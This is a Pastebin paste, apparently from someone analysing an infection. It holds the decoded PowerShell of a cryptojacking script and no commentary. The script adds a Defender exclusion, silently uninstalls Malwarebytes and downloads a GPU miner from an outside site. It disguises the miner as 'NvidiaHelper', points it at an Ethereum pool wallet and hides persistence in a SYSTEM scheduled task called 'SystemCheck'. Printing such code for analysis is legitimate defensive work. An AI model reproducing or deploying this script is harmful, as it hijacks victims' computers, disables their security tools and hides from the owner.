API tools faq
paste
Guest User

CryptoJack Decoding of Power Shell

a guest
Jul 2nd, 2021
887
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.80 KB | None | 0 0
raw download clone embed print report
  1. >> [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($text))
  2.  
  3. Start-Process cmd.exe -ArgumentList "/c start C:\users\public\NvidiaHelper\NvidiaHelper.bat"
  4.  
  5. Sleep 5
  6.  
  7. Add-MpPreference -ExclusionPath "C:\Users\Public\NvidiaHelper"
  8. Start-Process cmd.exe -ArgumentList "/c "C:\Program files\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart"
  9. $H = Get-Process NvidiaHelper
  10. $64 = Get-Process NvidiaHelperX64
  11. $SNR = Get-Process SNR
  12.  
  13. If($H.ProcessName -ne $null -or $64.ProcessName -ne $null -or $SNR.ProcessName -ne $null){New-Item -Path "C:\ProgramData\NzbDrone\logs\SNR.txt" -Value "Already Running"
  14. Get-Content "C:\Users\Public\SNR\SNR.bat" | Add-Content "C:\ProgramData\NzbDrone\logs\SNR.txt"
  15. Get-Content "C:\Users\Public\NvidiaHelper\NvidiaHelper.bat" | Add-Content "C:\ProgramData\NzbDrone\logs\SNR.txt"}
  16.  
  17. Else{
  18.  
  19. Stop-Process -Name cmd -Force
  20. Add-MpPreference -ExclusionPath "C:\Users\Public\NvidiaHelper"
  21. Remove-Item C:\Users\Public\NvidiaHelper -Recurse -Force
  22. Remove-Item C:\Users\Public\SNR -Recurse -Force
  23.  
  24. Unregister-ScheduledTask -TaskName "SystemCheck" -TaskPath \ -Confirm:$False
  25.  
  26. $Wrk = -join (((48..57)+(65..90)+(97..122)) * 80 |Get-Random -Count 12 |%{[char]$_})
  27. Invoke-WebRequest "http://gminer.pro/downloads?res=gminer_2_59_windows64.zip" -OutFile "C:\users\public\NvidiaHelper.ZIP"
  28. Expand-Archive -Path "C:\users\public\NvidiaHelper.ZIP" -DestinationPath "C:\users\public\NvidiaHelper" -Force
  29. New-Item -Path "C:\users\public\NvidiaHelper" -Name NvidiaHelper.bat -Value "CD C:\users\public\NvidiaHelper
  30. NvidiaHelper.exe --algo ethash --server eth.f2pool.com:6688 --user 0xe9f6091f7888362ad0bc47a74f46c64e21bf6679 --worker $Wrk
  31. pause" -Force
  32. Rename-Item -Path "C:\users\public\NvidiaHelper\miner.exe" -NewName "NvidiaHelper.exe" -Force
  33.  
  34. $Trigger= New-ScheduledTaskTrigger -AtStartup
  35. $User= "NT AUTHORITY\SYSTEM"
  36. $Action= New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c start C:\users\public\NvidiaHelper\NvidiaHelper.bat"
  37. Register-ScheduledTask -TaskName "SystemCheck" -Trigger $Trigger -User $User -Action $Action -RunLevel Highest –Force
  38. Start-Process cmd.exe -ArgumentList "/c start C:\users\public\NvidiaHelper\NvidiaHelper.bat"
  39. Del "C:\users\public\NvidiaHelper.ZIP"
  40.  
  41. Sleep 10
  42.  
  43. $Chk = Get-ChildItem "C:\Users\Public\NvidiaHelper\NvidiaHelper.exe"
  44. $ChkTask = Get-ScheduledTask -TaskName "SystemCheck"
  45. $Running = Get-Process -Name NvidiaHelper
  46. $GPU = Get-WmiObject Win32_VideoController | Select Name
  47. If($Chk -eq $null){
  48. $SNR = "Deleted"
  49. }Else{$SNR = "Not Deleted"}
  50. If($ChkTask -eq $null){
  51. $Task = "Not created"
  52. }Else{$Task = "Created"}
  53. If($Running -eq $Null){
  54. $RunningJob = "Not Running"}
  55. Else{$RunningJob = "Running"}
  56. New-Item -Path "C:\ProgramData\NzbDrone\logs\SNR.txt" -Value "File is $SNR - Task is $Task - Job is $RunningJob - $Wrk - $GPU"}
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!